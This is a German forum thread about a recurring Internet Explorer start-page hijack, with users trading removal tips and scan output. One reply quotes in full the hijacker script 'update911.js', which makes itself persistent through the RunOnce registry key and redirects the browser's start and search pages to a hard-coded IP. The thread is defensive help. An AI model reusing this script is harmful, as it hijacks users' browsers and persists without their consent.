Viren, Spyware, Datenschutz 11.258 Themen, 94.807 Beiträge

Verfolgung starten Optionen

Lästige startseite

Space Lord / 10 Antworten / Baumansicht Nickles

Hab da mal son Problem.... ;D
Mit dem IE...
Keine angst bin grad am umsteigen ;) (versuch mich grad mit Opera.. oder gibts da bessere fürn normal user?)
Trotzdem möchte ich mal gern wissen was hir vor sich geht
Seit Wochen wird meine Startseite im IE umgeändert und zwar in der reg. So: http://%69%6e%2e%77%65%62%63%6f%75%6e%74%65%72%2e%63%63/%2d%2d/?%79%64%74%66%73
(Unter:HKEY_CURRENT_USER/Software/Microsoft/InternetExplorer/main u. /serch)
LOL ne? Lande dann immer als Startpage bei ner Suchmaschine: http://Fastserch.cc
Das ulkige ist das ich mit ad-aware UND spybot alles wech fege UND die einträge in der reg. manuell umändere.
Windows Neustart geht gut aber wehe er war ganz aus ..... dann is der ganze Scheiß wieder da...!
Ich hab überhaupt keine Idee wo da noch was sein könnte =( Platte hab ich mit antivir gescannt... nix!

Spybot findet dann folgendes immer wieder aufs neue :

HotKeysHook: Keylogger library (Datei, nothing done)
C:\\WINDOWS\\SYSTEM\\H@tKeysH@@k.DLL

Possible hijacker: Global settings (Registrierungsdatenbank-Änderung, nothing done)
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Styles\\User Stylesheet=

Possible hijacker: Global settings (Registrierungsdatenbank-Änderung, nothing done)
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Styles\\Use My Stylesheet=W=0

Possible hijacker: User settings (Registrierungsdatenbank-Änderung, nothing done)
HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Styles\\User Stylesheet=


--- Spybot-S&D version: 1.2 ---
2003-11-24 Includes\\Spybots.sbi
2003-11-21 Includes\\Temporary.sbi
2003-11-05 Includes\\Cookies.sbi
2003-11-05 Includes\\Dialer.sbi
2003-11-24 Includes\\Hijackers.sbi
2003-11-11 Includes\\Keyloggers.sbi
2003-11-20 Includes\\Malware.sbi
2003-03-16 Includes\\plugin-ignore.ini
2003-11-05 Includes\\Security.sbi
2003-11-12 Includes\\QA Tests.sbi
2003-11-05 Includes\\Tracks.uti
2003-11-21 Includes\\Trojans.sbi


(Hier noch nicht behoben aber spybot sagt zumindest das es behoben wurde wenn er veddisch is )
Auch wenn mir IE jetzt ma am Arsch vorbei geht will ich den kack von der Platte ham.

Thnx schon mal

bei Antwort benachrichtigen
flipside Space Lord „Lästige startseite“
Optionen

nee lass ma opera is schon geil
lad dir mal spybot search n destroy von chip oder so
damit müsstest du das zeugs loswerden

daflip
bei Antwort benachrichtigen
Space Lord flipside „nee lass ma opera is schon geil lad dir mal spybot search n destroy von chip...“
Optionen

Nö werd ich nich.... -.-
hab schon und ad-aware auch =(

bei Antwort benachrichtigen
-IRON- Space Lord „Lästige startseite“
Optionen
HijackThis installieren, Scanreport speichern und hier posten.
Wer Trolle toleriert, toleriert Lügen.
bei Antwort benachrichtigen
NetzJunkie Space Lord „Lästige startseite“
Optionen

Hi Space Lord,

habe exakt denselben Schwachsinn hin und wieder als Startseite. Unter meinen Favoriten ist Fastsearch auch regelmäßig zu finden. Habe Spybot, Spyware Blaster und Ad-Aware 6 drüber rennen lassen... den Rest der Geschichte hast du ja bereits beschrieben. Den Scanreport von HiJack poste ich jetzt mal nicht, denn - ich muss los ; )

Bin gespannt was es hier noch zu lesen gibt.
Behaltet die Nerven,
NJ

bei Antwort benachrichtigen
xavior Space Lord „Lästige startseite“
Optionen

Sucht mal alle nach diesem Beitrag: "Internet Explorer öffnet fremde startseite"!

bei Antwort benachrichtigen
flipside xavior „Sucht mal alle nach diesem Beitrag: Internet Explorer öffnet fremde startseite !“
Optionen

meinste den hier: http://www.nickles.de/static_cache/537510801.html
gibt also doch nix neues unter der sonne *bg*

daflip
bei Antwort benachrichtigen
Tilo Nachdenklich Space Lord „Lästige startseite“
Optionen

Keylogger und geänderte Startseite könnte eine Kombination oder Teilauswahl aus folgendem sein:
1) svdhost.exe nennt sich "Orvell" (Überwachungssoftware).
2) eine gefälschte Datei svchost.exe (also neueres Dateidatum). Auch sychosts.exe oder sychostc.exe. Wahrscheinlich im Gefolge sys.ini (Text lesen) oder sysini.ini. Und weiter:
msto32.del und svchost.txt.
3) Vielleicht tmksrvl.exe, msdos.exe, mssys.exe, loader.exe, MSIN32.dll

Such mal im Windows-Ordner nach den Dateien und in der Registry in Run-Schlüsseln.

bei Antwort benachrichtigen
rojasa Space Lord „Lästige startseite“
Optionen

Hi,

es handelt sich sicher um einen Skript, der immer wieder ausgeführt wird sobald Du dich abmeldest bzw. den Computer neu startest. Suche einfach mal auf C: nach *.js und öffne mit Wordpad, die Dateien die unter c:\windows + Unterordner oder c:\programme + Unterordner zu finden sind. Ausnahmen:

c:\windows\system32\oobe
c:\windows\help\tours
c:\programme\real\realone player

Also die Skripst in diesen Ordnern brauchst Du eigentlich nicht öffnen. Bei mir war die Datei update911.js, die unter c:windows zu finden war. Sie sah so aus:

var url = "http://81.211.105.8/index.php?v=1";
var burl = "http://81.211.105.8/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

Sobald Du die Datei gefunden hast (muss nicht update911.js sein), einfach mal im Regedit den Eintrag löschen (und natürlich auch die Datei auf Deiner Festplatte).

ein nützliches Programm findest Du unter http://mjc1.com/mirror/hjt/. Das Programm zeigt alles, was mit Windows über die Registrierung (Regedit)gestartet wird. Einfach Programm starten --> Scann --> die entsprechenden Einträge markieren und --> Fix Cheched und sie zu löschen. Geht wesentlich schneller als mit Regedit zu suchen :)

Ich wünsche Dir viel Glück und Erfolg bei der Suche!

Viele Grüße
rojasa

bei Antwort benachrichtigen
NetzJunkie rojasa „Hi, es handelt sich sicher um einen Skript, der immer wieder ausgeführt wird...“
Optionen

Hi Rojasa,

da vom SpaceLord nichts mehr zu hören ist und ich das gleiche Problem hatte, bedanke ich mich jetzt mal für Deine Antwort ; ) Und auch für die anderen ; )

Habe mittlerweile einfach mal die ganze Kiste formatiert, somit ist das Problem auch gelöst.

C ya,
NJ

bei Antwort benachrichtigen
istegalwerichbin rojasa „Hi, es handelt sich sicher um einen Skript, der immer wieder ausgeführt wird...“
Optionen

Hi Rojasa

hatte exakt das selbe problem, bei mir war auch eine datei "update12.js" zu finden, die im runonce eingetragen war und ähnliche eintragungen wie die hier angegebene datei hat.

dank deines beitrags konnte ich das problem beheben.

vielen dank

ciao
gonzo

bei Antwort benachrichtigen